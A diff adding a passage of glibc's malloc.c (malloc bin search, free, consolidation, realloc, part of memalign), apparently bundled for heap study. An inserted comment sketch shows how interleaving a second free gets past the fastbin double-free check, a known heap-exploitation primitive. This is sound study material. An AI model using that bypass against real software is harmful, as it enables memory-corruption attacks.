+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
+                            malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                      if (bck->fd != fwd)
+                        malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
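+
+/*
+  A minimal illustrative sketch (not part of glibc): the fasttop check
+  above only compares the chunk being freed against the current head of
+  its fastbin.  Freeing the same pointer twice in direct succession
+  aborts with "double free or corruption (fasttop)", but freeing a
+  different chunk of the same size in between moves the head, so the
+  second free of `a' passes the check.  Assumes a build in which these
+  frees reach the fastbin path directly (e.g. the no-tcache libcs
+  bundled alongside this one).
+
+    #include <stdlib.h>
+
+    int main(void)
+    {
+      char *a = malloc(0x20);   // fastbin-sized request
+      char *b = malloc(0x20);
+
+      free(a);                  // fastbin head -> a
+      // free(a);               // a second free(a) here would abort (fasttop)
+      free(b);                  // fastbin head -> b
+      free(a);                  // head is b, not a: check passes, a listed twice
+      return 0;
+    }
+*/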
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
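+
+/*
+  A minimal illustrative sketch (not part of glibc): besides the
+  FASTBIN_CONSOLIDATION_THRESHOLD check in _int_free() above,
+  malloc_consolidate() is also reached from mtrim() and __libc_mallopt()
+  below, so a program can flush its fastbins on demand.  Assumes the free
+  actually lands in a fastbin (in tcache-enabled builds a small free may
+  sit in tcache instead) and glibc's <malloc.h> declaration of
+  malloc_trim().
+
+    #include <stdlib.h>
+    #include <malloc.h>
+
+    int main(void)
+    {
+      void *p = malloc(0x40);
+      free(p);          // p sits in a fastbin; its neighbours still see it as in use
+      malloc_trim(0);   // mtrim() -> malloc_consolidate(): fastbins are emptied and
+                        // p is coalesced into the unsorted bin or into top
+      return 0;
+    }
+*/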
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
